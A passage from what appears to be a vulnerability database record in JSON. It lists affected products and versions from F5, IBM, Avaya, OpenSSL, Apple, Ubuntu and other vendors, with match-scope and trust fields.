hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": 